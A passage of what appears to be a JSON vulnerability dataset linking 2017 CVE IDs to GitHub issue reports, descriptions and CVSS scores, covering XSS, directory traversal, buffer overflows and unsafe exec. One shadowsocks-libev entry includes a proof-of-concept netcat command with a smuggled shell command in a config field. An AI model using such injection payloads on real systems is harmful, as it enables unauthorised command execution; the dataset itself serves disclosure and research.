  9759. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9760. "severity": "HIGH",
  9761. "baseScore": 7.8,
  9762. "impactScore": 5.9,
  9763. "exploitabilityScore": 1.8
  9764. },
  9765. {
  9766. "CVE_ID": "CVE-2017-15609",
  9767. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/3868",
  9768. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/3868",
  9769. "Repo_new": "octopusdeploy/issues",
  9770. "Issue_Created_At": "2017-10-18T03:35:01Z",
  9771. "description": "Sensitive variables can be written in clear text when using Offline Drop targets. Issue See private issue for more details: URLTAG Sensitive variable value is written to variable file as clear text. Offline drop deployments generate two variable JSON files: one for normal variables which are written in clear text, and one for sensitive variables which is encrypted using the Offline Drop Target's encryption password. If any variable is sensitive, Octopus requires any Offline Drop Target to specify a valid encryption password, and any sensitive values will be encrypted into that file. If your project uses complex nested bindings, the resulting values can be treated as non sensitive and written to the clear text variables file. If an attacker can gain access to these offline drop files, they can gain the sensitive data without needing to decrypt it. Affected versions This affects Octopus APITAG up to APITAG , and is fixed in Octopus APITAG . Implemented solution We now use the configuration of the Offline Drop Target as the switch. If the user has configured an encryption password, they have opted in to have all their variables encrypted, regardless of whether there are any sensitive values or not.",
  9772. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  9773. "severity": "HIGH",
  9774. "baseScore": 7.5,
  9775. "impactScore": 3.6,
  9776. "exploitabilityScore": 3.9
  9777. },
  9778. {
  9779. "CVE_ID": "CVE-2017-15610",
  9780. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/3869",
  9781. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/3869",
  9782. "Repo_new": "octopusdeploy/issues",
  9783. "Issue_Created_At": "2017-10-18T03:45:14Z",
  9784. "description": "Certificate private keys downloadable when guest user has admin rights. Issue See private issue: URLTAG When the special Guest user account is granted the APITAG permission, and Guest Access is enabled for the Octopus Server, an attacker can sign in as the Guest account and export Certificates managed by Octopus, including the private key. We generally recommend the Guest account is not granted these high level permissions, but want to take the extra step to ensure private keys are never leaked to the Guest user account. Affected Versions Octopus APITAG to APITAG . Fixed in Octopus APITAG . Implemented Solution The special Guest account is specifically denied access to export certificates including the private key, even if the Guest account has been granted the APITAG permission. Fixed in URLTAG",
  9785. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  9786. "severity": "MEDIUM",
  9787. "baseScore": 6.5,
  9788. "impactScore": 3.6,
  9789. "exploitabilityScore": 2.8
  9790. },
  9791. {
  9792. "CVE_ID": "CVE-2017-15611",
  9793. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/3864",
  9794. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/3864",
  9795. "Repo_new": "octopusdeploy/issues",
  9796. "Issue_Created_At": "2017-10-17T04:06:12Z",
  9797. "description": "Further restrict APITAG action to those with APITAG and APITAG permissions. To further reflect what was the intention of the power of APITAG it will now require additional privileges to be granted. Reasoning By inviting a user to an existing team, the user is editing a team, and causing the creation of a user. This would allow them to invite a user to a team with greater privilege than their own. To make it clear they will now require APITAG which makes it more obvious the power of this action.",
  9798. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  9799. "severity": "MEDIUM",
  9800. "baseScore": 6.5,
  9801. "impactScore": 3.6,
  9802. "exploitabilityScore": 2.8
  9803. },
  9804. {
  9805. "CVE_ID": "CVE-2017-15640",
  9806. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/1521",
  9807. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/1521",
  9808. "Repo_new": "phpipam/phpipam",
  9809. "Issue_Created_At": "2017-10-26T08:53:25Z",
  9810. "description": "Cross Site script. payload: /?ip NUMBERTAG EMAILTAG APITAG Utilization method NUMBERTAG the first account password login NUMBERTAG direct copy payload to the domain name back at site Vulnerability location\uff1a Home search box after login Official demo vulnerability replication \uff1a URLTAG",
  9811. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  9812. "severity": "MEDIUM",
  9813. "baseScore": 5.4,
  9814. "impactScore": 2.7,
  9815. "exploitabilityScore": 2.3
  9816. },
  9817. {
  9818. "CVE_ID": "CVE-2017-15806",
  9819. "Issue_Url_old": "https://github.com/zetacomponents/Mail/issues/58",
  9820. "Issue_Url_new": "https://github.com/zetacomponents/mail/issues/58",
  9821. "Repo_new": "zetacomponents/Mail",
  9822. "Issue_Created_At": "2017-10-24T00:40:55Z",
  9823. "description": "CVETAG : Critical RCE vulnerability. A critical remote code execution vulnerability has been discovered in current version. Please contact me at k EMAILTAG for more details.",
  9824. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9825. "severity": "HIGH",
  9826. "baseScore": 8.1,
  9827. "impactScore": 5.9,
  9828. "exploitabilityScore": 2.2
  9829. },
  9830. {
  9831. "CVE_ID": "CVE-2017-15871",
  9832. "Issue_Url_old": "https://github.com/commenthol/serialize-to-js/issues/3",
  9833. "Issue_Url_new": "https://github.com/commenthol/serialize-to-js/issues/3",
  9834. "Repo_new": "commenthol/serialize-to-js",
  9835. "Issue_Created_At": "2017-10-23T12:23:27Z",
  9836. "description": "deserialize method is vulnerable. FILETAG Hi, there is a vulnerability in deserialize method, please see APITAG above.",
  9837. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  9838. "severity": "HIGH",
  9839. "baseScore": 7.5,
  9840. "impactScore": 3.6,
  9841. "exploitabilityScore": 3.9
  9842. },
  9843. {
  9844. "CVE_ID": "CVE-2017-15924",
  9845. "Issue_Url_old": "https://github.com/shadowsocks/shadowsocks-libev/issues/1734",
  9846. "Issue_Url_new": "https://github.com/shadowsocks/shadowsocks-libev/issues/1734",
  9847. "Repo_new": "shadowsocks/shadowsocks-libev",
  9848. "Issue_Created_At": "2017-10-13T15:04:42Z",
  9849. "description": "Command Execution in ss manager. Overview Severity Rating: High Confirmed Affected Versions NUMBERTAG Confirmed Patched Versions: N/A Vendor: Shadowsocks Vendor URL: URLTAG Vector: Local Credit NUMBERTAG D Sec APITAG Niklas Abel Status: Public CVE: not yet assigned Advisory URL: URLTAG Summary and Impact APITAG libev offers local command execution per configuration file or/and additionally, code execution per UDP request on APITAG The configuration file on the file system or the JSON configuration received via UDP request is parsed and the arguments are passed to the \"add_server\" function. The function calls APITAG server);\" which returns a string from the parsed configuration. The string gets executed at line NUMBERTAG if (system(cmd NUMBERTAG so if a configuration parameter contains \"||evil command&&\" within the \"method\" parameter, the evil command will get executed. The ss manager uses UDP port NUMBERTAG to get control commands on APITAG By default no authentication is required, although a password can be set with the ' k' parameter. Product Description Shadowsocks libev is a lightweight secured SOCKS5 proxy for embedded devices and low end boxes. The ss manager is meant to control Shadowsocks servers for multiple users, it spawns new servers if needed. It is a port of Shadowsocks created by MENTIONTAG and maintained by MENTIONTAG and MENTIONTAG Proof of Concept As passed configuration requests are getting executed, the following command will create file \"evil\" in /tmp/ on the server: nc u APITAG NUMBERTAG add: {\"server_port NUMBERTAG password\":\"test\", \"method\":\"||touch /tmp/evil||\"} The code is executed through PATHTAG If the configuration file on the file system is manipulated, the code would get executed as soon as a Shadowsocks instance is started from ss manage, as long as the malicious part of the configuration has not been overwritten. Workarounds There is no workaround available, do not use ss manage until a patch is released. About NUMBERTAG D Sec APITAG NUMBERTAG D Sec is a provider of application security services. We focus on application code reviews, design review and security testing NUMBERTAG D Sec APITAG was founded in NUMBERTAG by Markus Vervier. We support customers in various industries such as finance, software development and public institutions. Timeline NUMBERTAG Issues found NUMBERTAG endor contacted NUMBERTAG endor contacted, replied to use APITAG for a full disclosure NUMBERTAG endor contacted, asked if the vendor is sure to want a full disclosure NUMBERTAG endor contacted, replied to create a public issue on APITAG NUMBERTAG Created public issues on APITAG",
  9850. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  9851. "severity": "HIGH",
  9852. "baseScore": 7.8,
  9853. "impactScore": 5.9,
  9854. "exploitabilityScore": 1.8
  9855. },
  9856. {
  9857. "CVE_ID": "CVE-2017-15928",
  9858. "Issue_Url_old": "https://github.com/ohler55/ox/issues/194",
  9859. "Issue_Url_new": "https://github.com/ohler55/ox/issues/194",
  9860. "Repo_new": "ohler55/ox",
  9861. "Issue_Created_At": "2017-10-27T03:26:47Z",
  9862. "description": "Seg fault parse_obj. POC file: APITAG crash: ERRORTAG gdb backtrace: ERRORTAG",
  9863. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  9864. "severity": "HIGH",
  9865. "baseScore": 7.5,
  9866. "impactScore": 3.6,
  9867. "exploitabilityScore": 3.9
  9868. },
  9869. {
  9870. "CVE_ID": "CVE-2017-15931",
  9871. "Issue_Url_old": "https://github.com/radare/radare2/issues/8731",
  9872. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8731",
  9873. "Repo_new": "radareorg/radare2",
  9874. "Issue_Created_At": "2017-10-23T12:20:07Z",
  9875. "description": "radare2 invalid memory access in r_endian.h. An invalid memory access issue was found in r_endian.h when handling crafted elf files, which may lead to potential attack. PATHTAG PATHTAG v radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a NUMBERTAG commit: APITAG build NUMBERTAG PATHTAG gdb q PATHTAG Reading symbols from PATHTAG (gdb) r q c ia ./radare2 sigsegv r endian NUMBERTAG poc Starting program: PATHTAG q c ia ./radare2 sigsegv r endian NUMBERTAG poc FILETAG",
  9876. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9877. "severity": "HIGH",
  9878. "baseScore": 7.8,
  9879. "impactScore": 5.9,
  9880. "exploitabilityScore": 1.8
  9881. },
  9882. {
  9883. "CVE_ID": "CVE-2017-15932",
  9884. "Issue_Url_old": "https://github.com/radare/radare2/issues/8743",
  9885. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8743",
  9886. "Repo_new": "radareorg/radare2",
  9887. "Issue_Created_At": "2017-10-26T06:09:51Z",
  9888. "description": "radare2 invalid memory access in elf.c. An invalid memory access issue was found in radare2 elf.c on NUMBERTAG bit linux when handling crafted elf file. Build information: CODETAG Backtrace: ERRORTAG My environment: ERRORTAG A POC file has been attached to reproduce this issue. FILETAG",
  9889. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9890. "severity": "HIGH",
  9891. "baseScore": 7.8,
  9892. "impactScore": 5.9,
  9893. "exploitabilityScore": 1.8
  9894. },
  9895. {
  9896. "CVE_ID": "CVE-2017-15953",
  9897. "Issue_Url_old": "https://github.com/extramaster/bchunk/issues/2",
  9898. "Issue_Url_new": "https://github.com/extramaster/bchunk/issues/2",
  9899. "Repo_new": "extramaster/bchunk",
  9900. "Issue_Created_At": "2017-08-31T09:46:50Z",
  9901. "description": "Heap Buffer Overflow on bchunk NUMBERTAG and NUMBERTAG I discovered an instance of heap buffer overflow bug on bchunk NUMBERTAG and NUMBERTAG This issue was discovered and can be replicated on a NUMBERTAG bit Ubuntu machine, for instance I discovered the issue on APITAG The following is some stack trace information, please kindly advise how and where can I share the full output with more details and also the POC files to replicate the issue: ERRORTAG I have emailed the author a few days ago but I don't think he still maintain the code, since NUMBERTAG was published in NUMBERTAG However, this project's NUMBERTAG was published in NUMBERTAG so I believe that this is still maintained. This seems to be the only active upstream for bchunk. If this is not the right place to report the issue, please kindly point me to the right direction, thanks a lot!",
  9902. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9903. "severity": "MEDIUM",
  9904. "baseScore": 5.5,
  9905. "impactScore": 3.6,
  9906. "exploitabilityScore": 1.8
  9907. },
  9908. {
  9909. "CVE_ID": "CVE-2017-15953",
  9910. "Issue_Url_old": "https://github.com/hessu/bchunk/issues/1",
  9911. "Issue_Url_new": "https://github.com/hessu/bchunk/issues/1",
  9912. "Repo_new": "hessu/bchunk",
  9913. "Issue_Created_At": "2017-11-13T23:41:33Z",
  9914. "description": "CVETAG : heap based buffer overflow and crash when processing a malformed CUE file.. bchunk NUMBERTAG is vulnerable to a heap based buffer overflow and crash when processing a malformed CUE file. Fix committed in APITAG provided by Yegor Timoshenko. Fixed in version NUMBERTAG CVETAG URLTAG",
  9915. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9916. "severity": "MEDIUM",
  9917. "baseScore": 5.5,
  9918. "impactScore": 3.6,
  9919. "exploitabilityScore": 1.8
  9920. },
  9921. {
  9922. "CVE_ID": "CVE-2017-15954",
  9923. "Issue_Url_old": "https://github.com/extramaster/bchunk/issues/3",
  9924. "Issue_Url_new": "https://github.com/extramaster/bchunk/issues/3",
  9925. "Repo_new": "extramaster/bchunk",
  9926. "Issue_Created_At": "2017-09-09T10:54:33Z",
  9927. "description": "Another Heap Buffer Overflow on bchunk NUMBERTAG and NUMBERTAG This issue is a heap related error similar to URLTAG url but when replicated using gdb exploitable, it has a hash value that is different. There were NUMBERTAG different payloads that produces the same hash value as URLTAG url but only NUMBERTAG other payload produces the following hash value, which makes it evident that this heap related error is caused by a different part of the code NUMBERTAG APITAG ERRORTAG NUMBERTAG APITAG ERRORTAG The following is the stack trace output from gdb: ERRORTAG",
  9928. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9929. "severity": "MEDIUM",
  9930. "baseScore": 5.5,
  9931. "impactScore": 3.6,
  9932. "exploitabilityScore": 1.8
  9933. },
  9934. {
  9935. "CVE_ID": "CVE-2017-15955",
  9936. "Issue_Url_old": "https://github.com/extramaster/bchunk/issues/4",
  9937. "Issue_Url_new": "https://github.com/extramaster/bchunk/issues/4",
  9938. "Repo_new": "extramaster/bchunk",
  9939. "Issue_Created_At": "2017-09-09T11:08:37Z",
  9940. "description": "Access violation near NULL on destination operand. I have discovered several malformed cue files that would cause bchunk to run into segmentation fault. With the help of gdb exploitable, it can be determined that there was an access violation near NULL on the destination operand. The following is a full output: ERRORTAG",
  9941. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9942. "severity": "MEDIUM",
  9943. "baseScore": 5.5,
  9944. "impactScore": 3.6,
  9945. "exploitabilityScore": 1.8
  9946. },
  9947. {
  9948. "CVE_ID": "CVE-2017-15955",
  9949. "Issue_Url_old": "https://github.com/hessu/bchunk/issues/2",
  9950. "Issue_Url_new": "https://github.com/hessu/bchunk/issues/2",
  9951. "Repo_new": "hessu/bchunk",
  9952. "Issue_Created_At": "2017-11-13T23:48:47Z",
  9953. "description": "CVETAG : Access violation near NULL on destination operand and crash when processing a malformed CUE file. bchunk NUMBERTAG dies with access violation near NULL on destination operand when processing a malformed CUE file. Fix committed in APITAG provided by Yegor Timoshenko. Fixed in version NUMBERTAG CVETAG URLTAG",
  9954. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9955. "severity": "MEDIUM",
  9956. "baseScore": 5.5,
  9957. "impactScore": 3.6,
  9958. "exploitabilityScore": 1.8
  9959. },
  9960. {
  9961. "CVE_ID": "CVE-2017-16006",
  9962. "Issue_Url_old": "https://github.com/jonschlinkert/remarkable/issues/227",
  9963. "Issue_Url_new": "https://github.com/jonschlinkert/remarkable/issues/227",
  9964. "Repo_new": "jonschlinkert/remarkable",
  9965. "Issue_Created_At": "2016-08-20T17:23:28Z",
  9966. "description": "security hole with data: URLs. If you render the markdown xss APITAG APITAG using remarkable in Firefox, clicking it will run a script on the domain of the page displaying the rendered markup (test on URLTAG which can be a security issue. Do you think we could change the protocol blacklist to instead be a whitelist and only include some of the most common protocols? I realize it's already customizable by overriding APITAG but a more secure default would be nice. If that's too big of a change, \"data:\" should at least be filtered out in addition to javascript: and vbscript:.",
  9967. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  9968. "severity": "MEDIUM",
  9969. "baseScore": 6.1,
  9970. "impactScore": 2.7,
  9971. "exploitabilityScore": 2.8
  9972. },
  9973. {
  9974. "CVE_ID": "CVE-2017-16009",
  9975. "Issue_Url_old": "https://github.com/ceolter/ag-grid/issues/1287",
  9976. "Issue_Url_new": "https://github.com/ag-grid/ag-grid/issues/1287",
  9977. "Repo_new": "ag-grid/ag-grid",
  9978. "Issue_Created_At": "2016-11-28T21:29:18Z",
  9979. "description": "XSS vulnerability: Angular expression injection . I know that ag grid already covers HTML injection since NUMBERTAG but lately we found out that an XSS attack is still possible with a little bit more work when an application uses angular. It is possible to escape expression sandboxing APITAG URLTAG ) and inject code that can break the application. Are there plans to address this issue eventually?",
  9980. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  9981. "severity": "MEDIUM",
  9982. "baseScore": 6.1,
  9983. "impactScore": 2.7,
  9984. "exploitabilityScore": 2.8
  9985. },
  9986. {
  9987. "CVE_ID": "CVE-2017-16013",
  9988. "Issue_Url_old": "https://github.com/hapijs/hapi/issues/3466",
  9989. "Issue_Url_new": "https://github.com/hapijs/hapi/issues/3466",
  9990. "Repo_new": "hapijs/hapi",
  9991. "Issue_Created_At": "2017-03-31T16:37:42Z",
  9992. "description": "Non handling of accept encoding header when the value does not conform to the regex. Greetings, We have been successfully using FILETAG (version APITAG on Node APITAG and Debian Jessie ) in production for a while now. Recently however we encountered strange entries in our logs. Specifically we started seeing a bunch of the following entries: ERRORTAG After much digging we were able to reproduce the issue using the following curl command $ curl X POST ' URLTAG d FILETAG H APITAG Type: application/json\" H \"accept encoding: deflate, gzip;q NUMBERTAG q NUMBERTAG APITAG As is immediately obvious, the APITAG header sent by the client is not correct according to the specification (since the APITAG after the last APITAG doesn't match). That results in the accept library's encoding function returning a Boom object that contains the value APITAG in the message property. It then seems like Hapi is using the Boom object as the actual encoding which ultimately makes the framework fail the following assertion (in APITAG ) ERRORTAG The end result is that the client that initiated the (erroneous) request is left hanging, since the framework never responds. Personally I don't care one bit about the client not receiving a response, however the fact that no response is produced results in various error logs in Internet facing reverse proxies (in the form of timeouts). I could create a PR that fixes this issue, but am hesitant to do so since I don't know what the behavior should be in this case. Should the appropriate response be an HTTP NUMBERTAG response, or something else (like using one of the correctly specified encodings)? It seems to me however that the current (non ) handling of such erroneous requests is not the desired behavior. Regards, George",
  9993. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  9994. "severity": "HIGH",
  9995. "baseScore": 7.5,
  9996. "impactScore": 3.6,
  9997. "exploitabilityScore": 3.9
  9998. },
  9999. {
  10000. "CVE_ID": "CVE-2017-16016",
  10001. "Issue_Url_old": "https://github.com/punkave/sanitize-html/issues/100",
  10002. "Issue_Url_new": "https://github.com/apostrophecms/sanitize-html/issues/100",
  10003. "Repo_new": "apostrophecms/sanitize-html",
  10004. "Issue_Created_At": "2016-03-26T10:59:21Z",
  10005. "description": "XSS through APITAG If we allowed at least one APITAG the result is a potential XSS vulnerability. APITAG CODETAG Problem in ontext method URLTAG : ERRORTAG text was already html decoded, by APITAG htmlparser2 setting, so we can break text context and inject custom HTML code",
  10006. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  10007. "severity": "MEDIUM",
  10008. "baseScore": 6.1,
  10009. "impactScore": 2.7,
  10010. "exploitabilityScore": 2.8
  10011. },
  10012. {
  10013. "CVE_ID": "CVE-2017-16018",
  10014. "Issue_Url_old": "https://github.com/restify/node-restify/issues/1018",
  10015. "Issue_Url_new": "https://github.com/restify/node-restify/issues/1018",
  10016. "Repo_new": "restify/node-restify",
  10017. "Issue_Created_At": "2016-02-25T11:04:50Z",
  10018. "description": "Cross site scripting error. I tested my restify server with this: URLTAG The returned data contains \" APITAG alert NUMBERTAG APITAG \" which some browsers will execute. Simple solution is to change the ERRORTAG at the end of the APITAG to something like this: callback(new ERRORTAG does not exist', APITAG",
  10019. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  10020. "severity": "MEDIUM",
  10021. "baseScore": 6.1,
  10022. "impactScore": 2.7,
  10023. "exploitabilityScore": 2.8
  10024. },
  10025. {
  10026. "CVE_ID": "CVE-2017-16019",
  10027. "Issue_Url_old": "https://github.com/GitbookIO/gitbook/issues/1609",
  10028. "Issue_Url_new": "https://github.com/gitbookio/gitbook/issues/1609",
  10029. "Repo_new": "GitbookIO/gitbook",
  10030. "Issue_Created_At": "2016-11-25T21:37:48Z",
  10031. "description": "Cross Site Scripting vulnerability in online reader!. I accidentally discovered that the online reader of APITAG is vulnerable to Cross Site Scripting (XSS) URLTAG . If HTML or Javascript code is not put in backticks to mark it as a code block (e.g. APITAG ) it will actually be executed. This is a severe security issue and should be addressed immediately. I added a harmless Javascript alert script to a page in my book for you to verify the issue: FILETAG > Disclaimer: I have reported this issue some weeks before via email and Slack but neither received a response nor was the issue fixed silently.",
  10032. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  10033. "severity": "MEDIUM",
  10034. "baseScore": 6.1,
  10035. "impactScore": 2.7,
  10036. "exploitabilityScore": 2.8
  10037. },
  10038. {
  10039. "CVE_ID": "CVE-2017-16020",
  10040. "Issue_Url_old": "https://github.com/notduncansmith/summit/issues/23",
  10041. "Issue_Url_new": "https://github.com/notduncansmith/summit/issues/23",
  10042. "Repo_new": "notduncansmith/summit",
  10043. "Issue_Created_At": "2016-04-08T13:07:34Z",
  10044. "description": "Unsafe use of eval. The following use of eval in PATHTAG is dangerous: ERRORTAG An attacker can use a malicious payload instead of a valid collection name to inject arbitrary commands. I suggest one of the following options: refactoring out eval, use adhoc regex validation or use a heavyweight sanitization package like URLTAG",
  10045. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10046. "severity": "CRITICAL",
  10047. "baseScore": 9.8,
  10048. "impactScore": 5.9,
  10049. "exploitabilityScore": 3.9
  10050. },
  10051. {
  10052. "CVE_ID": "CVE-2017-16021",
  10053. "Issue_Url_old": "https://github.com/garycourt/uri-js/issues/12",
  10054. "Issue_Url_new": "https://github.com/garycourt/uri-js/issues/12",
  10055. "Repo_new": "garycourt/uri-js",
  10056. "Issue_Created_At": "2016-03-15T07:38:00Z",
  10057. "description": "parse hangs on some long urls. During penetration tests with Burp Suite URLTAG we found that our app hangs on some requests. It turned out that uri js parse hangs on some long urls. Here is a simple script to reproduce it: CODETAG Here is the result on my machine ERRORTAG Notice how the time increases exponentially about NUMBERTAG for each new segment. So with long enough URL parse just hangs at NUMBERTAG CPU. It seems uri js uses a generated regex which in my case appears to be this: CODETAG",
  10058. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  10059. "severity": "MEDIUM",
  10060. "baseScore": 6.5,
  10061. "impactScore": 3.6,
  10062. "exploitabilityScore": 2.8
  10063. },
  10064. {
  10065. "CVE_ID": "CVE-2017-16023",
  10066. "Issue_Url_old": "https://github.com/sindresorhus/decamelize/issues/5",
  10067. "Issue_Url_new": "https://github.com/sindresorhus/decamelize/issues/5",
  10068. "Repo_new": "sindresorhus/decamelize",
  10069. "Issue_Created_At": "2015-12-23T00:56:07Z",
  10070. "description": "if the separator is |, this function does not work. You seem to have fallen prey to a \"regular expression injection attack\" :(.",
  10071. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10072. "severity": "HIGH",
  10073. "baseScore": 7.5,
  10074. "impactScore": 3.6,
  10075. "exploitabilityScore": 3.9
  10076. },
  10077. {
  10078. "CVE_ID": "CVE-2017-16024",
  10079. "Issue_Url_old": "https://github.com/gvarsanyi/sync-exec/issues/17",
  10080. "Issue_Url_new": "https://github.com/gvarsanyi/sync-exec/issues/17",
  10081. "Repo_new": "gvarsanyi/sync-exec",
  10082. "Issue_Created_At": "2016-01-24T07:00:02Z",
  10083. "description": "Insecure temporary directories. The module uses temporary directories but creates them in an insecure way. Besides general issues related to making of tmp files, the implementation in PATHTAG does not handle errors. The variable created is set to true even if the directory already exists and belongs to another user. It seems that errors should be handled by callback, but it is inconsistent with synchronous usage of fs.mkdir. Some node modules were suggested in response to the stackoverflow question \"nodejs Temporary file name [closed]\" URLTAG More details related to the issue are given in APITAG temporary files securely\" URLTAG This kind of vulnerability is discussed in general in FILETAG",
  10084. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  10085. "severity": "MEDIUM",
  10086. "baseScore": 6.5,
  10087. "impactScore": 3.6,
  10088. "exploitabilityScore": 2.8
  10089. },
  10090. {
  10091. "CVE_ID": "CVE-2017-16025",
  10092. "Issue_Url_old": "https://github.com/hapijs/nes/issues/171",
  10093. "Issue_Url_new": "https://github.com/hapijs/nes/issues/171",
  10094. "Repo_new": "hapijs/nes",
  10095. "Issue_Created_At": "2017-01-27T11:31:54Z",
  10096. "description": "server falls with bad cookie header. Node server falls. I think problem is in request without or bad cookie header. PATHTAG const auth = APITAG ^ ERRORTAG Cannot read property 'nes' of null at PATHTAG at APITAG [as parse] ( PATHTAG ) at APITAG ( PATHTAG ) at new APITAG ( PATHTAG ) at APITAG [as _add] ( PATHTAG ) at APITAG ( PATHTAG ) at APITAG APITAG at APITAG APITAG at PATHTAG at APITAG ( PATHTAG ) at APITAG ( PATHTAG ) at APITAG ( PATHTAG ) at APITAG ( PATHTAG ) at APITAG ( PATHTAG ) at APITAG APITAG at APITAG APITAG",
  10097. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10098. "severity": "MEDIUM",
  10099. "baseScore": 5.9,
  10100. "impactScore": 3.6,
  10101. "exploitabilityScore": 2.2
  10102. },
  10103. {
  10104. "CVE_ID": "CVE-2017-16026",
  10105. "Issue_Url_old": "https://github.com/request/request/issues/1904",
  10106. "Issue_Url_new": "https://github.com/request/request/issues/1904",
  10107. "Repo_new": "request/request",
  10108. "Issue_Created_At": "2015-11-16T11:42:12Z",
  10109. "description": "first argument must be a string of Buffer. Hi, I was running some code and got this error message: ERRORTAG Funny thing is, that if I replace the current version of request module with an older one NUMBERTAG PATHTAG ), according to changelog), everything works just fine. The code that causes this error is this: ERRORTAG",
  10110. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  10111. "severity": "MEDIUM",
  10112. "baseScore": 5.9,
  10113. "impactScore": 3.6,
  10114. "exploitabilityScore": 2.2
  10115. },
  10116. {
  10117. "CVE_ID": "CVE-2017-16029",
  10118. "Issue_Url_old": "https://github.com/henrytseng/hostr/issues/8",
  10119. "Issue_Url_new": "https://github.com/henrytseng/hostr/issues/8",
  10120. "Repo_new": "henrytseng/hostr",
  10121. "Issue_Created_At": "2016-12-11T12:22:18Z",
  10122. "description": "A directory traversal issue. This package is vulnerable to directory traversal. An attacker can provide input such as APITAG to read files outside of the specified working directory.",
  10123. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  10124. "severity": "HIGH",
  10125. "baseScore": 7.5,
  10126. "impactScore": 3.6,
  10127. "exploitabilityScore": 3.9
  10128. },
  10129. {
  10130. "CVE_ID": "CVE-2017-16038",
  10131. "Issue_Url_old": "https://github.com/shy2850/node-server/issues/10",
  10132. "Issue_Url_new": "https://github.com/shy2850/node-server/issues/10",
  10133. "Repo_new": "shy2850/node-server",
  10134. "Issue_Created_At": "2017-04-18T00:29:41Z",
  10135. "description": "Directory Traversal. First of all, this is an awesome package with lots of functionalities. It just has a directory traversal issue, which can be fixed by adding some filtering on the requested url path. To exploit the vulnerability, I can just send a web request say: APITAG to browse and retrieve any file on the hosting server. Notice: the above url does not work with wget or a browser. Try it by using APITAG in a FILETAG program.",
  10136. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  10137. "severity": "HIGH",
  10138. "baseScore": 7.5,
  10139. "impactScore": 3.6,
  10140. "exploitabilityScore": 3.9
  10141. },
  10142. {
  10143. "CVE_ID": "CVE-2017-16042",
  10144. "Issue_Url_old": "https://github.com/tj/node-growl/issues/60",
  10145. "Issue_Url_new": "https://github.com/tj/node-growl/issues/60",
  10146. "Repo_new": "tj/node-growl",
  10147. "Issue_Created_At": "2016-07-21T12:47:55Z",
  10148. "description": "Unsafe use of exec. The module does not sanitize the input before passing it to exec. Therefore the following code snippets may produce unexpected results for some of the users of the library: APITAG Use a sanitization npm module like shell quote or replace exec with spawn!",
  10149. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10150. "severity": "CRITICAL",
  10151. "baseScore": 9.8,
  10152. "impactScore": 5.9,
  10153. "exploitabilityScore": 3.9
  10154. },
  10155. {
  10156. "CVE_ID": "CVE-2017-16088",
  10157. "Issue_Url_old": "https://github.com/patriksimek/vm2/issues/59",
  10158. "Issue_Url_new": "https://github.com/patriksimek/vm2/issues/59",
  10159. "Repo_new": "patriksimek/vm2",
  10160. "Issue_Created_At": "2017-03-02T14:53:47Z",
